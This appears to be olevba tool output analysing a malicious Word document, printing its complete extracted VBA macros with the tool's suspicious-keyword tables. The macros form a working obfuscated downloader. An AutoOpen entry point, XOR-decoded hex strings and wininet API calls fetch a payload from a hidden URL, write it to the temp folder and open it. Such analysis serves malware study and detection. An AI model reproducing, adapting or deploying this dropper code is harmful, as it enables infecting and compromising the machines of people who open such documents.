Malicious Word macro

1. olevba 0.25 - http://decalage.info/python/oletools
2. Flags       Filename                                                        
3. ----------- -----------------------------------------------------------------
4. OLE:MASIHBD skettd~1.doc
5.  
6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
7.  
8. ===============================================================================
9. FILE: skettd~1.doc
10. Type: OLE
11. -------------------------------------------------------------------------------
12. VBA MACRO ThisDocument.cls
13. in file: skettd~1.doc - OLE stream: u'Macros/VBA/ThisDocument'
14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
15. Sub autoopen()
16. ZasimSimZa
17. End Sub
18. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
19. ANALYSIS:
20. +----------+----------+---------------------------------------+
21. | Type     | Keyword  | Description                           |
22. +----------+----------+---------------------------------------+
23. | AutoExec | AutoOpen | Runs when the Word document is opened |
24. +----------+----------+---------------------------------------+
25. -------------------------------------------------------------------------------
26. VBA MACRO BYP6.bas
27. in file: skettd~1.doc - OLE stream: u'Macros/VBA/BYP6'
28. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
29.  
30. Public Function ZasimSimZa()
31. Dim RikoSHET As Long
32. RikoSHET = 21
33. ETU2BUD3EM1 414, 263
34.  
35. End Function
36.  
37. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
38. ANALYSIS:
39. No suspicious keyword or IOC found.
40. -------------------------------------------------------------------------------
41. VBA MACRO BAP5.bas
42. in file: skettd~1.doc - OLE stream: u'Macros/VBA/BAP5'
43. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
44.  
45.  
46. Public Function NUCHTOGTISTRASHNAYA(Per3vi4y7 As String, Vt4oro8y89 As String) As String
47.    
48.     Dim Eto4T6Ne9Kak23VSE0 As Integer
49.     Dim Eto4T6Ne9Kak23VSE01 As Integer
50.    
51.    
52.     Dim G3eeeS3GE4W As Double
53.     G3eeeS3GE4W = 44.77
54.     G3eeeS3GE4W = G3eeeS3GE4W + Abs(G3eeeS3GE4W)
55.     Dim Eto4T6Ne9Kak23VSE As Long
56.    
57.     Dim Pet4rush5ka3 As Double
58.     Dim Eto4T6Ne9Kak23VSEO As String
59.    
60.     Dim SomeDate As Date
61.     SomeDate = DateAdd("yyyy", 4, "22/11/2003")
62.    
63.    
64.     Pet4rush5ka3 = 0
65.             For Eto4T6Ne9Kak23VSE = 1 To _
66.     ( _
67.     Op8Red7ElyAET3 _
68.     (Vt4oro8y89) _
69.     / 2)
70.     Pet4rush5ka3 = Pet4rush5ka3 + 0.1
71.         Eto4T6Ne9Kak23VSE0 = Val("&H" & _
72.         (Mid$(Vt4oro8y89, _
73.         (2 * Eto4T6Ne9Kak23VSE) - 1, 2)))
74.         Eto4T6Ne9Kak23VSE01 = Asc(Mid$(Per3vi4y7, _
75.         ((Eto4T6Ne9Kak23VSE Mod Len(Per3vi4y7)) + 1), 1))
76.         Eto4T6Ne9Kak23VSEO = Eto4T6Ne9Kak23VSEO + Chr(Eto4T6Ne9Kak23VSE0 Xor Eto4T6Ne9Kak23VSE01)
77.     Next Eto4T6Ne9Kak23VSE
78.    NUCHTOGTISTRASHNAYA = Eto4T6Ne9Kak23VSEO
79.    SomeDate = DateAdd("yyyy", 1, SomeDate)
80.    
81. End Function
82.  
83.  
84.  
85. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
86. ANALYSIS:
87. +------------+----------------+-----------------------------------------+
88. | Type       | Keyword        | Description                             |
89. +------------+----------------+-----------------------------------------+
90. | Suspicious | Chr            | May attempt to obfuscate specific       |
91. |            |                | strings                                 |
92. | Suspicious | Xor            | May attempt to obfuscate specific       |
93. |            |                | strings                                 |
94. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
95. |            |                | may be used to obfuscate strings        |
96. |            |                | (option --decode to see all)            |
97. +------------+----------------+-----------------------------------------+
98. -------------------------------------------------------------------------------
99. VBA MACRO BEP4.bas
100. in file: skettd~1.doc - OLE stream: u'Macros/VBA/BEP4'
101. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
102.  
103.  
104. Public Const VEEWWWEE33211 = "601A0D1E5F4672041D5A5E560C415A025B"
105. Public Const HR553366221 = "6F101D16570D035A5D18055743504B08"
106. Public Const WREGLEYSPEAR14 = "5B061C0209471C031E0055410A0102001B5B0258561852150D5C47455C1A015F5950435156420501581A075A1D171017"
107. Public Const WREGLEYSPEAR13 = "60111A1B431C5A1A0A18715C01506014464708587C0A59170B06"
108. Public Const C2332234325 = "h3rhr3h3tm675m53m53m53"
109.  
110.  
111.  
112. Public Function RIKAKELLLE2(ByRef SAAARD1 As Object, SomeINCOME As Integer) As Object
113. Set RIKAKELLLE2 = SAAARD1.GetSpecialFolder(2)
114. End Function
115. Public Function ETU2BUD3EM1(RUFRUFRUF As Double, I9PUST5ESHE2 As Integer)
116.  
117. AUTO1AUTO2 ("CA_LLS_AAAL_CSL_921_29")
118. End Function
119.  
120.  
121. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
122. ANALYSIS:
123. +------------+----------------+-----------------------------------------+
124. | Type       | Keyword        | Description                             |
125. +------------+----------------+-----------------------------------------+
126. | Suspicious | Hex Strings    | Hex-encoded strings were detected, may  |
127. |            |                | be used to obfuscate strings (option    |
128. |            |                | --decode to see all)                    |
129. | Suspicious | Dridex Strings | Dridex-encoded strings were detected,   |
130. |            |                | may be used to obfuscate strings        |
131. |            |                | (option --decode to see all)            |
132. +------------+----------------+-----------------------------------------+
133. -------------------------------------------------------------------------------
134. VBA MACRO BOP2.bas
135. in file: skettd~1.doc - OLE stream: u'Macros/VBA/BOP2'
136. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
137.  
138. Public Const OOOAOOA12KNEV3 = "KKKALLLLISTO820**02**_____++++"
139.  
140.  
141. Public _
142. Function AUTO1AUTO2(CEM7HAZ1 _
143. As _
144. String)
145. VHOD1SU1
146. End Function
147. Public Function VHOD1SU1()
148.  
149. Dim T929929T  As Object
150. Set T929929T = CreateObject _
151. (NUCHTOGTISTRASHNAYA(C2332234325, WREGLEYSPEAR13))
152.  
153.  
154. Dim ADeeee11 As Double
155.  
156. ADeeee11 = 2232.5
157. Dim FAAAAE5WT As Long
158. FAAAAE5WT = Abs(ADeeee11)
159.  
160.  
161. Dim RUBUBUBUBU2211 As Object
162. Set RUBUBUBUBU2211 = RIKAKELLLE2(T929929T, 3444)
163. AD34BF54VC11 = 45.5 + 43
164. Dim VEEQ332199
165. ASDFKJF = NUCHTOGTISTRASHNAYA(C2332234325, HR553366221)
166. VEEQ332199 = RUBUBUBUBU2211 & ASDFKJF
167. Dim RU8FU7S4 As Integer
168. FB2R3RWT4E5WT = Abs(AD34BF54VC11 + 12)
169. Dim HI6M8A9DA0 As Integer
170.  
171. HI6M8A9DA0 = FB2R3RWT4E5WT - AD34BF54VC11
172.  
173. If BMT74326784(T929929T, VEEQ332199, 1425) Then
174. T929929T. _
175. DeleteFile VEEQ332199
176. End If
177. If NEGIZNBILA(VEEQ332199) Then
178. End If
179. Set SSSS = Nothing
180. If BMT74326784(T929929T, VEEQ332199, 2561) Then
181. End If
182. Set LPOOOO3222333 = CreateObject _
183. (NUCHTOGTISTRASHNAYA _
184. (C2332234325, VEEWWWEE33211))
185. LPOOOO3222333.Open VEEQ332199
186. End Function
187.  
188. Public Sub HHFOOEAKMMANNAN()
189. '
190. ' dddd Ìàêðîñ
191. ' ewh
192. '
193.    Selection.TypeText Text:="hhehalkkcl "
194.     Selection.TypeParagraph
195.     Selection.TypeText Text:="sdfjjjfsdjkkdkfkk"
196.     Selection.TypeParagraph
197.     Selection.TypeText Text:="dskkdsfkkkfkk"
198.     Selection.TypeParagraph
199.     Selection.WholeStory
200.     Selection.Font.Bold = wdToggle
201.     Selection.Font.Italic = wdToggle
202.     If Selection.Font.Underline = wdUnderlineNone Then
203.         Selection.Font.Underline = wdUnderlineSingle
204.     Else
205.         Selection.Font.Underline = wdUnderlineNone
206.     End If
207.     If Selection.Font.Underline = wdUnderlineNone Then
208.         Selection.Font.Underline = wdUnderlineSingle
209.     Else
210.         Selection.Font.Underline = wdUnderlineNone
211.     End If
212.     Selection.Font.Italic = wdToggle
213.     Selection.Font.Bold = wdToggle
214.     Selection.Range.HighlightColorIndex = wdYellow
215.     Options.DefaultHighlightColorIndex = wdBrightGreen
216.     Selection.Range.HighlightColorIndex = wdBrightGreen
217.     Options.DefaultHighlightColorIndex = wdTurquoise
218.     Selection.Range.HighlightColorIndex = wdTurquoise
219.     Options.DefaultHighlightColorIndex = wdPink
220.     Selection.Range.HighlightColorIndex = wdPink
221.     Options.DefaultHighlightColorIndex = wdTeal
222.     Selection.Range.HighlightColorIndex = wdTeal
223.     Selection.Font.Color = wdColorDarkTeal
224.     Selection.Font.Color = wdColorLightOrange
225.     Selection.Font.Color = wdColorDarkYellow
226.     Selection.TypeBackspace
227. End Sub
228.  
229. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
230. ANALYSIS:
231. +------------+--------------+-----------------------------------------+
232. | Type       | Keyword      | Description                             |
233. +------------+--------------+-----------------------------------------+
234. | Suspicious | CreateObject | May create an OLE object                |
235. | Suspicious | Open         | May open a file                         |
236. | Suspicious | Hex Strings  | Hex-encoded strings were detected, may  |
237. |            |              | be used to obfuscate strings (option    |
238. |            |              | --decode to see all)                    |
239. +------------+--------------+-----------------------------------------+
240. -------------------------------------------------------------------------------
241. VBA MACRO BUP3.bas
242. in file: skettd~1.doc - OLE stream: u'Macros/VBA/BUP3'
243. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
244.  
245. #If VBA7 And Win64 Then
246. Public Declare PtrSafe Function Kud2at3o Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As LongPtr) As Long
247. Public Declare PtrSafe Function Reb6ya7ta9 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As LongPtr
248. Public Declare PtrSafe Function Fiz6kul7tur2ra1 Lib "wininet.dll" Alias "InternetReadFile" (ByVal etoeshekto23333 As LongPtr, ByVal REKOMDEDEBET1 As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
249. Public Declare PtrSafe Function ho7Ro8Vo5D1 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As LongPtr, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As LongPtr
250. #Else
251. Public Declare Function Kud2at3o Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As Long) As Long
252. Public Declare Function Reb6ya7ta9 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As Long
253. Public Declare Function Fiz6kul7tur2ra1 Lib "wininet.dll" Alias "InternetReadFile" (ByVal etoeshekto23333 As Long, ByVal REKOMDEDEBET1 As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
254. Public Declare Function ho7Ro8Vo5D1 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As Long, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As Long
255. #End If
256.  
257. Public Function Op8Red7ElyAET3(AS1AeW2W3WW As String) As Integer
258. Op8Red7ElyAET3 = Len(AS1AeW2W3WW)
259. End Function
260.  
261.  
262.  
263. #If VBA7 _
264.     And Win64 Then
265.        Public Function SomeFunct4(ByRef RUKALICO87 As LongPtr, HLOPUSHKA6 As LongPtr, Hernya As String) As Boolean
266.     #Else
267.        Public Function SomeFunct4(ByRef RUKALICO87 As Long, HLOPUSHKA6 As Long, Hernya As String) As Boolean
268.     #End If
269. Dim URLPURL1 As String
270.     URLPURL1 = NUCHTOGTISTRASHNAYA(C2332234325, WREGLEYSPEAR14)
271.    
272.                 RUKALICO87 _
273.     = ho7Ro8Vo5D1 _
274.     ( _
275.     HLOPUSHKA6, _
276.     URLPURL1, vbNullString, _
277.     0, _
278.     etoeshekto2, 0)
279.     SomeFunct4 = True
280. End Function
281.  
282.  
283. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
284. ANALYSIS:
285. +------------+----------------+-----------------------------------------+
286. | Type       | Keyword        | Description                             |
287. +------------+----------------+-----------------------------------------+
288. | Suspicious | Lib            | May run code from a DLL                 |
289. | Suspicious | Hex Strings    | Hex-encoded strings were detected, may  |
290. |            |                | be used to obfuscate strings (option    |
291. |            |                | --decode to see all)                    |
292. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
293. |            |                | may be used to obfuscate strings        |
294. |            |                | (option --decode to see all)            |
295. | IOC        | wininet.dll    | Executable file name                    |
296. +------------+----------------+-----------------------------------------+
297. -------------------------------------------------------------------------------
298. VBA MACRO BIP1.bas
299. in file: skettd~1.doc - OLE stream: u'Macros/VBA/BIP1'
300. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
301. Option Explicit
302.  
303.  
304. Private Const NENAKRASHENNAYA872 = 8162
305. Private Const NENAKRASHENNAYA871 As String = "Nu Pust Budet tak"
306. Private Const NENAKRASHENNAYA999 = 1
307. Private Const etoeshekto2 = &H4000000
308.  
309. Public Function NEGIZNBILA _
310. (ByVal PESNYABI As String) As Boolean
311.     #If VBA7 _
312.     And Win64 Then
313.         Dim VMESTO2 As LongPtr, YABIL2 As LongPtr
314.     #Else
315.         Dim VMESTO2 As Long, YABIL2 As Long
316.     #End If
317.     Dim ETOTYAZABILDAVNO As Long
318.     Dim REKOMDEDEBET1 As String * NENAKRASHENNAYA872, POKORO4E As String
319.     Dim SISKAPIR721 As Integer, DLINIYPAREN As Double
320.     VMESTO2 = Reb6ya7ta9(NENAKRASHENNAYA871, NENAKRASHENNAYA999, vbNullString, vbNullString, 0)
321.     If VMESTO2 = 0 Then
322.         Exit Function
323.     End If
324.     Dim FiGaMan As Boolean
325.    
326.     If SomeFunct4(YABIL2, VMESTO2, "Popkorn") Then
327.     End If
328.     If YABIL2 = 0 Then
329.         DLINIYPAREN = 0
330.     Else
331.         Fiz6kul7tur2ra1 YABIL2, REKOMDEDEBET1, NENAKRASHENNAYA872, ETOTYAZABILDAVNO
332.         POKORO4E = REKOMDEDEBET1
333.         Do While ETOTYAZABILDAVNO <> 0
334.             Fiz6kul7tur2ra1 YABIL2, REKOMDEDEBET1, NENAKRASHENNAYA872, ETOTYAZABILDAVNO
335.            
336.             Dim BEE999999332 As Long
337. For BEE999999332 = 14 To 18
338. If BEE999999332 = 38 Then End
339. Next BEE999999332
340.            
341.             POKORO4E = POKORO4E + Mid(REKOMDEDEBET1, 1, ETOTYAZABILDAVNO)
342.         Loop
343.             DLINIYPAREN = Len(POKORO4E): SISKAPIR721 = FreeFile
344.         Open PESNYABI _
345.             For Binary Access Write _
346.         Lock Write _
347.         As #SISKAPIR721
348.         Put #SISKAPIR721, _
349.                 , POKORO4E
350.         Dim HH457457547LLLL As Double
351.             For HH457457547LLLL = 2 To 3
352.     If HH457457547LLLL = 37 Then End
353.                     Next HH457457547LLLL
354.         Close #SISKAPIR721
355.     End If
356.     Kud2at3o YABIL2
357.     Kud2at3o VMESTO2
358.     POKORO4E = ""
359.     If DLINIYPAREN Then
360.         NEGIZNBILA = True
361.     End If
362. End Function
363.  
364. Public Function BMT74326784(ByRef PLO9 As Object, ByVal ASXXX3 As String, Ribka As Integer) As Boolean
365. If PLO9.FileExists(ASXXX3) Then
366. BMT74326784 = True
367. Else
368. BMT74326784 = False
369. End If
370. End Function
371.  
372. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
373. ANALYSIS:
374. +------------+-------------+-----------------------------------------+
375. | Type       | Keyword     | Description                             |
376. +------------+-------------+-----------------------------------------+
377. | Suspicious | Open        | May open a file                         |
378. | Suspicious | Write       | May write to a file (if combined with   |
379. |            |             | Open)                                   |
380. | Suspicious | Put         | May write to a file (if combined with   |
381. |            |             | Open)                                   |
382. | Suspicious | Binary      | May read or write a binary file (if     |
383. |            |             | combined with Open)                     |
384. | Suspicious | Hex Strings | Hex-encoded strings were detected, may  |
385. |            |             | be used to obfuscate strings (option    |
386. |            |             | --decode to see all)                    |
387. +------------+-------------+-----------------------------------------+
388. -------------------------------------------------------------------------------
389. VBA MACRO UserForm1.frm
390. in file: skettd~1.doc - OLE stream: u'Macros/VBA/UserForm1'
391. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
392. (empty macro)